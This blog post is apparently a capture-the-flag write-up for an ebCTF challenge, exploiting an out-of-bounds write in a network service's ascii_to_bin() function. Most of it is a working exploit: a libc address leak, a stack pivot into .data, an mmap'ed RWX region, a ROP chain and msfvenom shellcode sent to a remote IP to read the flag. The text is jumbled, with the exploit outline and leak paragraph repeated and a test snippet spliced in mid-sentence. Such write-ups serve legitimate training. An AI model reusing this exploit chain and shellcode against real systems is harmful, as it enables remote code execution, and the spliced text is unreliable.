Myself and Xelenonz worked on this challenge. Xelenonz found critical details about the challenge. He managed to take control of saved EIP in read_from_client() function. Below is the details about it
[*] Leak address of __libc_start_main from GOT using send()
[*] Return into read() to copy stage 2 payload into .data section
[*] Shift stack into .data section using leave; ret gadget
[*] Shifted stack has gadgets to return into mmap(), allocate a new memory with RWX
[*] Return into read() to copy shellcode into mmap()'ed region
[*] Jump into the starting address of mmap()'ed region
Leaked address of __libc_start_main was found to be 0xf76303e0. The __libc_start_main offset in my ubuntu VM was 0x193e0. Now
ascii_to_bin("abcdef",&str) => str = 0xabcdef ascii_to_bin("deadbeef",&str) => str = 0xdeadbeef echo `perl -e 'print "A"x72,"41"x4,"42"x4,"a8c00408","\r\n"'` | nc 127.0.0.1 7070 ret => 0x41414141str is 0x20 bytes away from EBP. In ascii_to_bin(), we can see
*(_BYTE *)(i + str) = v2 | n_to_i(buf[2 * i + 1]);This eventually leads to the vulnerability, as i value increases in loop, *(_BYTE *)(i + str) goes past allocated buffer in read_from_client(). Once this was found, we started building our exploit on top of this. Below is the idea of exploit
[*] Leak address of __libc_start_main from GOT using send()
[*] Return into read() to copy stage 2 payload into .data section
[*] Shift stack into .data section using leave; ret gadget
[*] Shifted stack has gadgets to return into mmap(), allocate a new memory with RWX
[*] Return into read() to copy shellcode into mmap()'ed region
[*] Jump into the starting address of mmap()'ed region
Leaked address of __libc_start_main was found to be 0xf76303e0. The __libc_start_main offset in my ubuntu VM was 0x193e0. Now
>>> hex(0xf76303e0 - 0x193e0) '0xf7617000'This very much looked like base address of libc. So we used address offsets from this libc and it worked. Below is the full exploit
#!/usr/bin/env python import socket import struct import time ip = '127.0.0.1' ip = '54.217.15.93' port = 7070 soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM) soc.connect((ip, port)) # msfvenom shell = ( "\xbb\x3e\xa8\x55\xd1\xdb\xdb\xd9\x74\x24\xf4\x5a\x33\xc9" + "\xb1\x0f\x31\x5a\x12\x83\xc2\x04\x03\x64\xa6\xb7\x24\xf2" + "\xbd\x6f\x5e\x50\xa4\xe7\x4d\x37\xa1\x1f\xe5\x98\xc2\xb7" + "\xf6\x8e\x0b\x2a\x9e\x20\xdd\x49\x32\x54\xc8\x8d\xb3\xa4" + "\xdc\xef\xda\xca\x0d\x83\x74\x32\x7f\x00\xa5\x41\x17\xfa" + "\x83\x91\xc7\x3c\xea\xed\x07\x16\xa1\x84\xe9\x55\xc5" ) payload = "A"*72 payload += "938d0408" # pop2ret payload += "41414141" # payload += "00a00408" # need to be valid address payload += "208a0408" # send(4,__libc_start_main,0x4,0) @ PLT payload += "dca70408" # pop ebx ; pop esi ; pop edi ; pop ebp ; ret payload += "04000000" # fd payload += "64c00408" # buf payload += "04000000" # size payload += "00000000" # flag payload += "c0870408" # read @ PLT payload += "dca70408" # pop ebx ; pop esi ; pop edi ; pop ebp ; ret payload += "04000000" # fd payload += "c0c00408" # .data payload += "00040000" # size payload += "c0c00408" # .data payload += "898a0408" # leave, ret; stack shifting payload += "\r\n" soc.send(payload) addr = struct.unpack("<I",(soc.recv(1024)))[0] # address leak print hex(addr) # stage 2 payload = struct.pack("<I", 0x0804c0c0) # .data payload += struct.pack("<I", addr+(0xd1d00)) # mmap payload += struct.pack("<I", 0x08048d90) # add esp, 0x14 ; pop ebx ; pop ebp payload += struct.pack("<I", 0xbadc000) # address payload += struct.pack("<I", 1024) # size payload += struct.pack("<I", 7) # permission payload += struct.pack("<I", 34) payload += struct.pack("<I", 0x00) payload += struct.pack("<I", 0x00) payload += "MOVE" payload += struct.pack("<I", 0x080487c0) # read @ PLT payload += struct.pack("<I", 0xbadc000) # ret address payload += struct.pack("<I", 0x4) # fd payload += struct.pack("<I", 0xbadc000) # address payload += struct.pack("<I", 1024) # size soc.send(payload + "\n") time.sleep(1) # stage 3 soc.send(shell+"\n") soc.send("cat goproot/FLAG\n") print soc.recv(1024)Here is the flag for the challenge : ebCTF{35a6673b2243c925e02e85dfa916036f}
No comments :
Post a Comment